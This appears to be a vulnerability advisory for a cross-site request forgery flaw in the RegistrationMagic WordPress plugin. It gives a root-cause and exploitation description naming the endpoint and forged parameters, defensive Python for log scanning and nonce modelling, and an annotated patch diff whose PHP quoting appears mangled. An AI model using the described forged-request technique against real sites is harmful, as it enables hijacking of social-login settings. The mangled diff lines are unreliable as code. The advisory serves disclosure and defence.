Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24374: RegistrationMagic <= 6.0.6.9 – Cross-Site Request Forgery (custom-registration-form-builder-with-submission-manager)

Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 6.0.6.9
Patched Version: 6.0.7.0
Disclosed: January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24374:
The RegistrationMagic WordPress plugin, versions up to and including 6.0.6.9, contains a Cross-Site Request Forgery vulnerability in its social login integration settings update functionality. This vulnerability allows unauthenticated attackers to trick an administrator into performing unauthorized actions, such as modifying authentication settings, via a forged request.

Root Cause:
The vulnerability exists in the `save_login_integrations` function within the file `custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php`. The function processes POST requests to update social login configuration settings (Facebook, Google, Twitter, etc.) without validating a WordPress nonce. Specifically, lines 374-415 in the vulnerable version execute the `save_options` method after checking only form validation via `$this->mv_handler->validateForm("login-integrations")`. The code lacks a nonce verification check before processing the `$request->req` parameters, which include sensitive API keys and client secrets.

Exploitation:
An attacker crafts a malicious HTML page containing a hidden form that targets the WordPress admin endpoint `admin.php?page=rm_login_sett_manage`. The form submits POST parameters corresponding to a social login type (e.g., `type=fb`, `enable_facebook=1`, `facebook_app_id=attacker_id`, `facebook_app_secret=attacker_secret`). When a logged-in administrator visits the malicious page, the form automatically submits, changing the plugin’s social login configuration to attacker-controlled values. This could redirect user authentication to malicious endpoints.
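As an added defender-side example (not part of the Atomic Edge analysis), the following Python scans web-server access logs in combined format for POST requests to the `admin.php?page=rm_login_sett_manage` endpoint whose Referer is missing or names a host other than the site itself, which is the shape a forged cross-site submission leaves behind. The site host, IP addresses and log lines are constructed for the example.

```python
"""Flag POSTs to the RegistrationMagic social-login settings endpoint that
arrive without a same-site Referer. Added example; the site host, addresses
and log lines below are constructed, not taken from any real server."""
import re
from urllib.parse import urlsplit

SITE_HOST = "example-site.test"             # constructed: the WordPress site's own host
TARGET_PATH = "/wp-admin/admin.php"
TARGET_QUERY = "page=rm_login_sett_manage"  # endpoint named in the analysis

# Apache/Nginx "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def targets_settings_endpoint(target: str) -> bool:
    """True when the request line points at the social-login settings page."""
    parts = urlsplit(target)
    return parts.path == TARGET_PATH and TARGET_QUERY in parts.query.split("&")


def is_suspicious(entry: dict) -> bool:
    """A POST to the settings page whose Referer is absent or from another host."""
    if entry["method"] != "POST" or not targets_settings_endpoint(entry["target"]):
        return False
    referer = entry["referer"]
    if referer in ("", "-"):
        return True  # no Referer at all: strict referrer policy or a hidden origin
    return urlsplit(referer).hostname != SITE_HOST


def scan(lines):
    """Return the parsed entries that match the CSRF heuristic, in log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            hits.append(entry)
    return hits


# Constructed sample: one legitimate save, one cross-site POST, one POST with no
# Referer, one harmless GET and one unrelated POST.
SAMPLE_LOG = [
    '203.0.113.10 - - [09/Jan/2026:10:00:01 +0000] "POST /wp-admin/admin.php?page=rm_login_sett_manage HTTP/1.1" 302 - "https://example-site.test/wp-admin/admin.php?page=rm_login_sett_manage" "Mozilla/5.0"',
    '203.0.113.10 - - [09/Jan/2026:10:05:42 +0000] "POST /wp-admin/admin.php?page=rm_login_sett_manage HTTP/1.1" 302 - "https://third-party.example/page.html" "Mozilla/5.0"',
    '203.0.113.10 - - [09/Jan/2026:10:06:10 +0000] "POST /wp-admin/admin.php?page=rm_login_sett_manage HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '203.0.113.10 - - [09/Jan/2026:10:07:00 +0000] "GET /wp-admin/admin.php?page=rm_login_sett_manage HTTP/1.1" 200 4821 "https://third-party.example/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Jan/2026:10:08:13 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} POST settings page, referer={hit["referer"]!r}')
```

Treat a hit as a triage signal rather than proof: administrators whose browsers apply a strict referrer policy also show `-`, so the two hits above need to be compared with the plugin's stored social login settings. On the vulnerable version a successful save is followed by `RM_Utilities::redirect` back to the same page (visible in the diff below), so a 302 on such a POST is the outcome to investigate first.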

Patch Analysis:
The patch adds nonce verification to the `save_login_integrations` function. It inserts a conditional check at line 375: `if (!isset($request->req['social_login_nonce']) || !wp_verify_nonce($request->req['social_login_nonce'], 'social_login_nonce'))`. If the nonce check fails, the function sets an error via `RM_PFBC_Form::setError` and does not proceed to save options. The nonce field `social_login_nonce` is added to the corresponding form template in `admin/views/template_rm_login_integrations.php` at line 23 via `new Element_Hidden("social_login_nonce", wp_create_nonce("social_login_nonce"))`. This ensures each form submission includes a unique, user-specific token that attackers cannot forge.
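To make the patch's mechanism concrete, here is a Python model of the WordPress nonce scheme the fix relies on, together with a stripped-down version of the `type=fb` branch of `save_login_integrations` in its vulnerable and patched forms. This is an added example, not code from the plugin or from Atomic Edge: the salt, user id, session token and request dictionaries are constructed stand-ins, and `create_nonce`/`verify_nonce` follow the WordPress algorithm (HMAC-MD5 over `tick|action|uid|token`, characters 12 through 3 from the end, with the current and the previous 12-hour tick accepted).

```python
"""Python model of the WordPress nonce check that the 6.0.7.0 patch adds to
save_login_integrations(). Added example, not plugin code: the salt, user id,
session token and request dictionaries are constructed stand-ins."""
import hashlib
import hmac
import math
import time

DAY_IN_SECONDS = 86400
ACTION = "social_login_nonce"  # action string used by the patch
NONCE_SALT = b"constructed-example-salt-not-a-real-wp_salt"  # stands in for wp_salt('nonce')


def wp_nonce_tick(now: float, nonce_life: int = DAY_IN_SECONDS) -> int:
    """WordPress wp_nonce_tick(): ceil(time() / (nonce_life / 2))."""
    return math.ceil(now / (nonce_life / 2))


def wp_hash(data: str) -> str:
    """WordPress wp_hash(): hash_hmac('md5', $data, wp_salt('nonce'))."""
    return hmac.new(NONCE_SALT, data.encode(), hashlib.md5).hexdigest()


def create_nonce(action: str, uid: int, session_token: str, now: float) -> str:
    """wp_create_nonce(): substr(wp_hash(tick|action|uid|token), -12, 10)."""
    return wp_hash(f"{wp_nonce_tick(now)}|{action}|{uid}|{session_token}")[-12:][:10]


def verify_nonce(nonce, action: str, uid: int, session_token: str, now: float) -> int:
    """wp_verify_nonce(): 1 for the current tick, 2 for the previous one, else 0."""
    if not isinstance(nonce, str):
        return 0
    tick = wp_nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = wp_hash(f"{t}|{action}|{uid}|{session_token}")[-12:][:10]
        if hmac.compare_digest(expected, nonce):
            return age
    return 0


def save_login_integrations(req: dict, uid: int, session_token: str, now: float, patched: bool) -> dict:
    """Model of the type=fb branch. Returns {'saved': options} or {'error': message}."""
    if patched:
        # The check the patch inserts before any option is written.
        nonce = req.get("social_login_nonce")
        if nonce is None or not verify_nonce(nonce, ACTION, uid, session_token, now):
            return {"error": "Nonce check failed. Please try again."}
    options = {}
    if req.get("type") == "fb":
        # Mirrors isset($request->req['enable_facebook']) ? "yes" : null
        options["enable_facebook"] = "yes" if "enable_facebook" in req else None
        options["facebook_app_id"] = req.get("facebook_app_id")
        options["facebook_app_secret"] = req.get("facebook_app_secret")
    return {"saved": options}


def demo(now: float = None) -> dict:
    """Run the four cases that matter and return their outcomes."""
    now = time.time() if now is None else now
    uid, session = 1, "constructed-session-token"
    # Cross-site forged POST: the attacker's page cannot read the admin's hidden nonce field.
    forged = {"type": "fb", "enable_facebook": "1",
              "facebook_app_id": "attacker_id", "facebook_app_secret": "attacker_secret"}
    # The admin's own submission carries the hidden field rendered by the template.
    legit = dict(forged, facebook_app_id="real_id", facebook_app_secret="real_secret",
                 social_login_nonce=create_nonce(ACTION, uid, session, now))
    # A nonce minted for a different user (or action, or session) is no use either.
    other_user = dict(legit, social_login_nonce=create_nonce(ACTION, 2, session, now))
    return {
        "vulnerable_forged": save_login_integrations(forged, uid, session, now, patched=False),
        "patched_forged": save_login_integrations(forged, uid, session, now, patched=True),
        "patched_legit": save_login_integrations(legit, uid, session, now, patched=True),
        "patched_other_user": save_login_integrations(other_user, uid, session, now, patched=True),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20s} {result}")
```

Running `demo()` shows the vulnerable handler storing `attacker_id` from the forged request, the patched handler rejecting the same request with the patch's error message, the administrator's own submission succeeding, and a nonce created for user 2 failing for user 1. The model also makes the token's real lifetime visible: a nonce verifies as 2 during the following 12-hour tick and as 0 after that, so it is bound to user, session, action and time rather than being unique per submission.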

Impact:
Successful exploitation allows attackers to modify the plugin’s social login integration settings. This can lead to account takeover by redirecting authentication flows to attacker-controlled OAuth applications, credential harvesting via fake login pages, or disruption of user registration and login functionality. The attack requires social engineering to lure an administrator into clicking a link, but no authentication or special privileges are needed for the forged request itself.

Differential between vulnerable and patched code

Code Diff
--- a/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
@@ -2336,8 +2336,6 @@

         }

-
-
         ?>

         <?php if($php_notice!=0): ?>
@@ -2354,20 +2352,6 @@

         <?php endif; ?>

-        <?php /* if($php_8_notice != 0 && isset($_GET['page']) && $_GET['page'] == 'rm_form_manage'):
-
-            if(version_compare(PHP_VERSION, '8.0.0', '>=')): ?>
-
-            <div id="rm-php-notice-warning" class="rm_admin_notice rm-notice-banner notice notice-warning is-dismissible">
-
-                <p><?php _e( 'You are using PHP 8. RegistrationMagic currently does not supports PHP 8 and you might see some unwanted errors or warnings. We are working on PHP 8 compatibility update and it will be available very soon.','custom-registration-form-builder-with-submission-manager'); ?> <a class="rm_dismiss" href="<?php echo esc_url($query_string).'rm_disable_php_8_notice=1' ?>"><?php _e('Dismiss','custom-registration-form-builder-with-submission-manager'); ?></a></p>
-
-            </div>
-
-            <?php endif;
-
-        endif; */ ?>
-
         <?php if($edd_notice!=0 &&  class_exists( 'Easy_Digital_Downloads')): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2378,8 +2362,6 @@

         <?php endif; ?>

-
-
         <?php if($wc_notice!=0 && class_exists( 'WooCommerce' )): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2390,6 +2372,18 @@

         <?php endif;

+        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+        $p_client_id = get_option('rm_option_paypal_client_id', '');
+        $p_client_secret = get_option('rm_option_paypal_secret_key', '');
+        if($modern_paypal && !empty($p_client_id) && empty($p_client_secret)): ?>
+            <div class="rm_admin_notice_banner rm-notice-banner notice notice-error">
+                <p style="vertical-align:middle;">
+                    <span style="color:#d63638;font-size:20px;" aria-hidden="true">⚠️</span>
+                    <?php echo wp_kses_post(sprintf(__( '<strong>Your PayPal Secret Key</strong> is required to receive payments with RegistrationMagic form submissions. Please <strong>update your PayPal Secret Key</strong> from the <a href="%s">Payment Settings</a> to continue receiving payments.','custom-registration-form-builder-with-submission-manager'), esc_url(admin_url('admin.php?page=rm_options_payment')))); ?>
+                </p>
+            </div>
+        <?php endif;
+
         if (function_exists('is_multisite') && is_multisite()) {
             $nl_subscribed = get_site_option('rm_option_newsletter_subbed', false);
         } else {
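Review bot: this hunk is unrelated to the CSRF fix; it adds a PayPal configuration banner and should be listed separately in the 6.0.7.0 changelog so operators reviewing the release for the security change are not surprised by a new admin notice. Reading `rm_option_paypal_secret_key` here is fine since only `empty()` is tested and the value is never echoed.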
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
@@ -374,37 +374,42 @@
         $setting_service= new RM_Setting_Service();
         $setting_service->set_model($model);
         if($this->mv_handler->validateForm("login-integrations")) {
-            $options= array();
-            if($data->type=='fb'){
-                $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
-                $options['facebook_app_id'] = $request->req['facebook_app_id'];
-                $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+            // Check nonce
+            if (!isset($request->req['social_login_nonce']) || !wp_verify_nonce($request->req['social_login_nonce'], 'social_login_nonce')) {
+                RM_PFBC_Form::setError('login-integrations', esc_html__('Nonce check failed. Please try again.', 'custom-registration-form-builder-with-submission-manager'));
+            } else {
+                $options= array();
+                if($data->type=='fb'){
+                    $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
+                    $options['facebook_app_id'] = $request->req['facebook_app_id'];
+                    $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+                }
+                else if($data->type=='inst'){
+                    $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
+                    $options['instagram_client_id'] = $request->req['instagram_client_id'];
+                    $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
+                }
+                else if($data->type=='win'){
+                    $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
+                    $options['windows_client_id'] = $request->req['windows_client_id'];
+                }
+                else if($data->type=='google'){
+                    $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
+                    $options['gplus_client_id'] = $request->req['gplus_client_id'];
+                }
+                else if($data->type=='tw'){
+                    $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
+                    $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
+                    $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
+                }
+                else if($data->type=='linked'){
+                    $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
+                    $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
+                    $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
+                }
+                $setting_service->save_options($options);
+                RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
             }
-            else if($data->type=='inst'){
-                $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
-                $options['instagram_client_id'] = $request->req['instagram_client_id'];
-                $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
-            }
-            else if($data->type=='win'){
-                $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
-                $options['windows_client_id'] = $request->req['windows_client_id'];
-            }
-            else if($data->type=='google'){
-                $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
-                $options['gplus_client_id'] = $request->req['gplus_client_id'];
-            }
-            else if($data->type=='tw'){
-                $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
-                $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
-                $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
-            }
-            else if($data->type=='linked'){
-                $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
-                $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
-                $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
-            }
-            $setting_service->save_options($options);
-            RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
         }
         $data->options = $setting_service->get_options();
         $view = $this->mv_handler->setView("login_integrations");
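Review bot: the nonce check closes the CSRF, but no capability check such as `current_user_can('manage_options')` appears before `$setting_service->save_options($options)`; if authorization is delegated to the admin menu registration, say so in a comment beside the nonce check, otherwise add it here, since a nonce proves intent but not privilege. Every value copied from `$request->req[...]` (app IDs, client secrets, consumer keys) is also stored unsanitized; `sanitize_text_field()` on each is cheap. Finally, the fix is one new `if`/`else` around the old body, yet re-indenting the whole branch makes the diff forty lines; an early `return` after `setError` would have kept the functional change visible.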
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
@@ -446,6 +446,7 @@
             $options_pp_pstyle = array("id" => "rm_pp_style_tb", "value" => $data['paypal_page_style'], "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_PAGESTYLE'));
             $options_pp_modern_enable = array("id"=> "rm_pp_modern_enable", "onclick" => "enable_paypal_modern_popup(this)", "value" => isset($data['paypal_modern_enable']) ? $data['paypal_modern_enable'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_MODERN'));
             $options_pp_client_id = array("id"=> "rm_pp_modern_client_id", "value" => isset($data['paypal_client_id']) ? $data['paypal_client_id'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_CLIENT_ID'));
+            $options_pp_secret_key = array("id"=> "rm_pp_modern_secret_key", "value" => isset($data['paypal_secret_key']) ? $data['paypal_secret_key'] : '',"longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_SECRET_KEY'));
             $image_dir = plugin_dir_url(dirname(dirname(__FILE__))) . "images";
             $layout_checked_state = array('gold' => null, 'blue' => null, 'silver' => null, 'white'=> null, 'black'=> null);
             $selected_layout = isset($data['paypal_btn_color']) ? $data['paypal_btn_color'] : 'gold';
@@ -504,6 +505,8 @@
                                             new Element_HTML('<div class="childfieldsrow" id="rm_pp_modern_enable_childfieldsrow" style="'.$enable_modern_paypal.'">'),
                                             new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_CLIENT_ID'), "paypal_client_id", $options_pp_client_id),
                                             new Element_HTML("<span id='rm_pp_modern_client_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Client ID is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
+                                            new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_SECRET_KEY'), "paypal_secret_key", $options_pp_secret_key),
+                                            new Element_HTML("<span id='rm_pp_modern_secret_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Secret Key is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
                                             new Element_HTML($paypal_btn_colorhtml),
                                             new Element_HTML('</div>')
                                             ),
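Review bot: `paypal_secret_key` is rendered through `Element_Textbox` with `"value" => $data['paypal_secret_key']` (previous hunk), so the stored secret is echoed back into the settings page as a plain text input. A password-type element, or a masked placeholder that only overwrites the stored value when the admin types a new one, keeps the secret out of page source, browser autofill and screen shares.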
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
@@ -20,6 +20,9 @@
             "prevent" => array("bootstrap", "jQuery"),
             "action" => ""
         ));
+
+        // Nonce
+        $form->addElement(new Element_Hidden("social_login_nonce", wp_create_nonce("social_login_nonce")));

         if($type=='fb'){
             if(RM_Utilities::is_ssl()){
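Review bot: this is the counterpart of the `wp_verify_nonce(..., 'social_login_nonce')` check in class_rm_login_manage_controller.php and the action string matches, so the pair is consistent. Using the field name as the action works, but a plugin-scoped action such as `rm_save_login_integrations` documents the nonce's purpose better and avoids reuse by another form in the same plugin.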
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
@@ -217,11 +217,17 @@
                 if(jQuery("input#rm_pp_modern_client_id").val().trim() == '') {
                     jQuery("input#rm_pp_modern_client_id").focus();
                     jQuery('span#rm_pp_modern_client_error_msg').show();
-
                     var rmErrorMsg = jQuery('span#rm_pp_modern_client_error_msg');
                     rmErrorMsg.insertAfter('#rm_pp_modern_client_id');
                     return;
                 }
+                if(jQuery("input#rm_pp_modern_secret_key").val().trim() == '') {
+                    jQuery("input#rm_pp_modern_secret_key").focus();
+                    jQuery('span#rm_pp_modern_secret_error_msg').show();
+                    var rmErrorMsg = jQuery('span#rm_pp_modern_secret_error_msg');
+                    rmErrorMsg.insertAfter('#rm_pp_modern_secret_key');
+                    return;
+                }
             } else if (jQuery("input#rm_pp_email_tb").val().trim() == '') {
                 jQuery("input#rm_pp_email_tb").focus();
                 jQuery('span#rm_pp_email_error_msg').show();
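Review bot: the new secret-key requirement is enforced only in JavaScript; the server side should reject an empty `paypal_secret_key` when modern PayPal is enabled, since this check is trivially bypassed and the banner added in class_rm_admin.php only warns after the fact. Also, `var rmErrorMsg` is now declared twice in the same function scope; use `let` inside each block or a single declaration above both checks.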
@@ -297,6 +303,11 @@
                 jQuery('span#rm_pp_modern_client_error_msg').hide();
             }
         });
+        jQuery("input#rm_pp_modern_secret_key").on('keyup', function() {
+            if(jQuery(this).val() != '') {
+                jQuery('span#rm_pp_modern_secret_error_msg').hide();
+            }
+        });

         jQuery("input#rm_pp_email_tb").on('keyup', function() {
             if(jQuery(this).val() != '') {
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
@@ -4557,7 +4557,7 @@
             case 'LABEL_PAYPAL_CLIENT_ID':
                 return __('PayPal Client ID', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_CLIENT_ID':
-                return __('Client ID can be obtained from PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
+                return __('Client ID can be obtained from your PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
             case 'LABEL_OPTIONS_PAYPAL_BTN_COLOR':
                 return __('Button Color', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PAYPAL_BTN_COLOR':
@@ -4800,7 +4800,7 @@
             case 'LABEL_PAYPAL_SECRET_KEY':
                 return __("PayPal Secret Key", 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_SECRET_KEY':
-                return __("Secret key is required only when form has subscription field.", 'custom-registration-form-builder-with-submission-manager');
+                return __("Secret key can be obtained from your PayPal dashboard.", 'custom-registration-form-builder-with-submission-manager');
             case 'FIELD_HELP_TEXT_SUBSCRIPTION_Not_Installed_Resctriction':
                 return __("RegistrationMagic Subscriptions Addons is required for this field to work. Please install and activate the RegistrationMagic Subscriptions Addons plugin.", 'custom-registration-form-builder-with-submission-manager');

--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
@@ -2285,13 +2285,14 @@
                     echo "<select " . $this->print_attributes($attributes) . " >";
                     foreach(RM_Utilities_Revamp::get_countries() as $ccode => $country) {
                         $ccode = strtolower(preg_replace('/.*[(.*)].*/', '$1', $ccode));
-                        if (isset($meta_value['country']) && $meta_value['country'] == $country) {
-                            $attributes['checked'] = 'checked';
-                        }
                         if(empty($ccode)) {
                             echo "<option value="">".esc_html($country)."</option>";
                         } else {
-                            echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                            } else {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            }
                         }
                     }
                     echo "</select>";
@@ -2416,7 +2417,11 @@
                             if(empty($code)) {
                                 echo "<option value="">".esc_html($country)."</option>";
                             } else {
-                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                                } else {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                }
                             }
                         }
                         echo "</select>";
--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
@@ -2005,6 +2005,17 @@
                                     }
                                     echo "<label for='rm_gateway_".wp_kses_post((string)$gateway)."'>".wp_kses_post($pay_procs_options[$gateway])."</label>";
                                     echo "</div>";
+                                    if ($gateway === 'paypal') {
+                                        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+                                        $client_id = get_option('rm_option_paypal_client_id', '');
+                                        $client_secret = get_option('rm_option_paypal_secret_key', '');
+                                        if ($modern_paypal && !empty($client_id) && empty($client_secret)) {
+                                            echo "<div class='rm-paypal-modern-notice' style='background:#fff3cd;color:#856404;border:1px solid #ffeeba;padding:12px 16px;margin:10px 0;border-radius:4px;display:flex;align-items:center;font-weight:500;font-size:15px;'>"
+                                                ."<span style='margin-right:10px;display:inline-flex;align-items:center;'><svg xmlns='http://www.w3.org/2000/svg' width='20' height='20' fill='none' viewBox='0 0 24 24'><circle cx='12' cy='12' r='10' fill='#ff0000ff'/><path d='M12 8v4m0 4h.01' stroke='#ffffffff' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'/></svg></span>"
+                                                .esc_html__('PayPal payment gateway isn't fully configured. Payments may not get updated correctly. Please contact site administrator to resolve this issue.', 'custom-registration-form-builder-with-submission-manager')
+                                                ."</div>";
+                                        }
+                                    }
                                 }
                             }
                             if(isset($form->form_options->show_total_price[0]) && $form->form_options->show_total_price[0] == 1) {
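Review bot: this notice is rendered into the public registration form, so every visitor learns that the site's PayPal gateway is misconfigured and is told to contact the administrator; the admin-only banner added in class_rm_admin.php covers the same condition for the people who can act on it, so consider dropping the public text or reducing it to a neutral "payments are temporarily unavailable". Separately, as shown here the string `'PayPal payment gateway isn't fully configured...'` contains an unescaped apostrophe inside a single-quoted PHP string; confirm it is `isn\'t` in the source.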
@@ -2687,7 +2698,7 @@
         ));
     }

-    private static function is_username_reserved($username_to_check) {
+    private function is_username_reserved($username_to_check) {
         if(empty($username_to_check))
             return false;

@@ -2702,7 +2713,7 @@
             return false;
     }

-    private static function show_subscription_checkboxes($form = null) {
+    private function show_subscription_checkboxes($form = null) {
         if(get_option('rm_option_enable_mailchimp') == 'yes' && $form->form_options->form_is_opt_in_checkbox == 1 && (isset($form->form_options->enable_mailchimp[0]) && $form->form_options->enable_mailchimp[0] == 1)) {
             //This outer div is added so that the optin text can be made full width by CSS.
             echo '<div class="rm_optin_text rm-subscription-wrap">';
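Review bot: changing `is_username_reserved()` and `show_subscription_checkboxes()` from `private static` to instance methods means every `self::`/`static::` call site must become `$this->`; none of those call sites appear in this diff, so confirm they were updated, otherwise the calls fail at runtime with a non-static-method error.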
--- a/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
+++ b/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
@@ -251,7 +251,7 @@
                             echo html_entity_decode(wp_kses((string)$data->linkedin_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->windows_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->twitter_html,RM_Utilities::expanded_allowed_tags()));
-                            echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
+                            //echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
                         }
                     ?>
                     </div>
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
  * Plugin Name:       RegistrationMagic
  * Plugin URI:        http://www.registrationmagic.com
  * Description:       A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version:           6.0.6.9
+ * Version:           6.0.7.0
  * Tags:              registration, form, custom, analytics, simple, submissions
  * Requires at least: 5.2.0
  * Requires PHP:      7.2
@@ -78,7 +78,7 @@
 */
 if(!defined('RM_PLUGIN_VERSION')) {
     define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
-    define('RM_PLUGIN_VERSION', '6.0.6.9');
+    define('RM_PLUGIN_VERSION', '6.0.7.0');
     define('RM_DB_VERSION', 5.9);
     define('RM_SHOW_WHATSNEW_SPLASH', false);  //Set it to 'false' to disable whatsnew screen.
     //define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
@@ -264,12 +264,6 @@

     register_activation_hook(__FILE__, 'RM_Activator::activate');
     register_deactivation_hook(__FILE__, 'RM_Deactivator::deactivate');
-    add_filter( 'auto_update_plugin', function( $update, $item ) {
-        if ( $item->plugin === RM_PLUGIN_BASENAME ) {
-            return false;
-        }
-        return $update;
-    }, 10, 2 );

     //Set up update check
     $rm_form_diary = array();
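Review bot: removing the `auto_update_plugin` filter that returned `false` for this plugin means WordPress auto-updates can now deliver releases such as this one, which directly improves how quickly the CSRF fix reaches installs. That deserves a changelog line, since sites that relied on the filter to pin the version will start updating automatically.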
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
@@ -321,23 +321,23 @@
         return $data; //We do not want form redirect to work in case paypal processing is going on.
     }

-    public function process_paypal_sdk_payment(){
-
+    public function process_paypal_sdk_payment() {
         if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
-            if(!isset($_POST['transaction'])|| !is_array($_POST['transaction']) ){
+            if(!isset($_POST['transaction']) || !is_array($_POST['transaction']) ) {
                 wp_send_json_error(array('msg'=>__('Transaction not valid.','custom-registration-form-builder-with-submission-manager')));
             }
